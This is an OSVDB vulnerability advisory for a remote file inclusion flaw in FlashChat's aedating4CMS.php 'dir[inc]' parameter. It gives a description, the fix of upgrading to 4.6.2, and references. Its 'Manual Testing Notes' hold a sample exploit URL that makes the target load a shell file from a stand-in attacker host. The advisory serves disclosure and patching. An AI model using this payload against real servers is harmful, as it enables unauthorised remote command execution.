FlashChat aedating4CMS.php dir[inc] Variable Remote File Inclusion

2006-09-04T08:48:58
ID OSVDB:28435
Type osvdb
Reporter NeXtMaN(mc.nadz@gmail.com)
Modified 2006-09-04T08:48:58

Description

Vulnerability Description

FlashChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to aedating4CMS.php not properly sanitizing user input supplied to the 'dir[inc]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 4.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

FlashChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to aedating4CMS.php not properly sanitizing user input supplied to the 'dir[inc]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://[attacker[/shell.txt?

References:

Vendor URL: http://www.tufat.com/s_flash_chat_chatroom.htm Secunia Advisory ID:21756 Related OSVDB ID: 28433 Related OSVDB ID: 28434 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0050.html Generic Exploit URL: http://milw0rm.com/exploits/2293 FrSIRT Advisory: ADV-2006-3449 CVE-2006-4583 Bugtraq ID: 19826